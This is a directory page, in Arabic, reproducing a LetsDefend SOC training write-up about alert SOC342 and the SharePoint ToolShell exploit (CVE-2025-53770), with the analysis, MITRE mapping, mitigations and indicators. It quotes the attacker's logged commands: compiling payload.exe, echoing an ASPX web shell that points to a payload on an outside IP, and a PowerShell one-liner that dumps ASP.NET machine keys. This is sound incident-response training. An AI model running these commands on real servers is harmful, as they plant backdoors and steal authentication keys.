Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE — نشاط لتدريب مهارات التحليل وإعداد التقارير | Kitploit
أدوات/GitHubGitHub/bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتحقيق الجنائي الرقمياستخبارات التهديداتالتعلم والتعليمالاستجابة للحوادثمختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
bossnick98/-soc342---cve-2025-53770-sharepoint-toolshell-auth-bypass-and-rce

-SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

نشاط لتدريب مهارات التحليل وإعداد التقارير

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

SOC342---CVE-2025-53770-SharePoint-ToolShell-Auth-Bypass-and-RCE

هذا تحقيق تم إجراؤه على منصة Let's Defend، استنادًا إلى ثغرة أمنية حديثة في SharePoint. دعونا نلقي نظرة.

Immagine 2025-07-27 162109
  1. افحص اسم القاعدة. عادةً ما يتم إنشاء أسماء القواعد خصيصًا للهجوم الذي سيتم اكتشافه. من خلال فحص اسم القاعدة، يمكنك فهم الهجوم الذي تواجهه.

اكتشفت قاعدة SOC342 طلب POST غير مصادق يستهدف صفحة ToolPane.aspx المعرضة للخطر، وتتميز بـ:

حمولة كبيرة (Content-Length: 7699)

مرجع مشبوه (SignOut.aspx) يُستخدم على الأرجح لإخفاء المصدر

سلوك يتوافق مع استغلال ثغرة ToolShell

  1. اكتشف بين أي جهازين يحدث المرور.

أرسل مستخدم خارجي (IP: 107.191.58.76) طلبًا مُصممًا إلى خادم SharePoint داخلي (172.16.20.17).

حلل سجل نقطة النهاية لدينا

2

قد تشير عملية w3wp.exe التي تنفذ أمر PowerShell مشفر إلى استغلال محتمل أو نشاط ما بعد الاستغلال (مثل تنفيذ حمولة مخفية).

في بيئة SharePoint، من المهم التحقق مما إذا كان هذا السلوك متوقعًا أم أنه يمثل إساءة استخدام.

تم إخفاء الأمر باستخدام base64

Immagine 2025-07-27 163800

تسمح هذه الحمولة للمهاجم باستخراج وطباعة مفاتيح تكوين ASP.NET الحرجة من الجهاز الذي يعمل عليه.

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:C:\Windows\Temp\payload.exe C:\Windows\Temp\payload.cs

"C:\Windows\System32\cmd.exe" /c echo <form runat="server"> <object classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11"><param name="Command" value="Redirect"> <param name="Button" value="Test"> <param name="Url" value="http://107.191.58.76/payload.exe\"> > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

يقوم بتجميع ملف تنفيذي من كود C# المصدر على الخادم.

ينشئ بابًا خلفيًا على الويب (ملف ASPX ضار) في مسار SharePoint، والذي عند زيارته يسمح بتنفيذ أو تحميل حمولة خارجية.

cmd.exe /c echo > C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx

يقوم هذا الأمر بإنشاء ملف باسم spinstall0.aspx في مجلد LAYOUTS في SharePoint وكتابة المحتوى فيه (هنا عنصر نائب يمثل كود قشرة ويب).

هذا هو تجزئة spinstall0.apx: 92bb4ddb98eeaf11fc15bb32e71d0a63256a0ed826a03ba293ce3a8bf057a514

دعنا نلقي نظرة على VirusTotal.

Immagine 2025-07-27 164912

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "[System.Web.Configuration.MachineKeySection]::GetApplicationConfig()"

يسمح هذا الأمر للمهاجم بالوصول إلى تكوين تطبيق MachineKeySection، مما قد يكشف عن مفاتيح تشفير حساسة مثل مفتاح التحقق ومفتاح فك التشفير.

هذه المفاتيح حاسمة لأمان ASP.NET، حيث تحمي أشياء مثل ملفات تعريف ارتباط المصادقة وViewState.

يمكن أن يؤدي كشف هذه المفاتيح أو استردادها إلى تمكين المهاجمين من تزوير رموز المصادقة، أو فك تشفير البيانات المحمية، أو تنفيذ هجمات أخرى ضد تطبيق الويب.

MITRE ATT&CK

mitre

ملاحظة المحلل:

تم إنشاء التنبيه بسبب نشاط PowerShell غير معتاد لوحظ على خادم SharePoint، وتبين لاحقًا أنه محاولة استغلال تستهدف CVE-2025-53770. أسقط المهاجم في البداية ملفًا تنفيذيًا مخصصًا بلغة C# وقام بتجميعه (payload.exe) باستخدام مترجم C# (csc.exe)، ثم أنشأ قشرة ويب ASPX ضارة (spinstall0.aspx) داخل دليل SharePoint يمكن الوصول إليه عبر الويب. بعد ذلك، تم تشغيل أمر PowerShell لاسترداد مفاتيح الآلة المشفرة الحساسة من تكوين الخادم عبر انعكاس .NET. يشير هذا التسلسل من الإجراءات إلى هجوم متعدد المراحل مصمم للحفاظ على تحكم دائم وربما تزوير رموز المصادقة. تم التحقق من أن قشرة الويب ضارة بنسبة كشف في VirusTotal تبلغ 39/62. تم تأكيد الحادث كإيجابي حقيقي، ويُنصح باتخاذ مزيد من إجراءات الاحتواء والمعالجة.

Immagine 2025-07-27 170751

تفاصيل CVE-2025-53770

يسمح إلغاء تسلسل البيانات غير الموثوقة في Microsoft SharePoint Server المحلي لمهاجم غير مصرح له بتنفيذ التعليمات البرمجية عبر الشبكة. تدرك Microsoft أن استغلالًا لـ CVE-2025-53770 موجود في البرية. تعمل Microsoft على إعداد واختبار تحديث شامل لمعالجة هذه الثغرة الأمنية. في غضون ذلك، يرجى التأكد من تطبيق التخفيف المقدم في وثائق CVE هذه لحمايتك من الاستغلال.

Immagine 2025-07-27 171020

التخفيف المقترح من Microsoft: للتخفيف من الهجمات المحتملة، يجب على العملاء:

  1. استخدام الإصدارات المدعومة من SharePoint Server المحلي

  2. تطبيق أحدث التحديثات الأمنية المرتبطة أعلاه.

  3. نشر حماية Microsoft Defender لنقطة النهاية، أو حلول التهديدات المماثلة

  4. التأكد من تشغيل واجهة فحص البرامج الضارة (AMSI) وتكوينها بشكل صحيح، مع حل مناسب لمكافحة الفيروسات مثل Defender Antivirus

  5. تدوير مفاتيح آلة ASP.NET الخاصة بخادم SharePoint

مؤشرات الاختراق (IoC)

Spinstall0.aspx قشرة ويب يستخدمها المهاجمون

قام المهاجمون أيضًا بتعديل اسم الملف بعدة طرق – مثل spinstall.aspx، spinstall1.aspx، spinstall2.aspx

يعتمد هذا التقرير على نشاط تم إجراؤه على منصة Let’s Defend. جميع النتائج والمواد المقدمة هي لأغراض تعليمية فقط. جميع الحقوق والملكية تعود إلى Let’s Defend.

تنزيل الأداة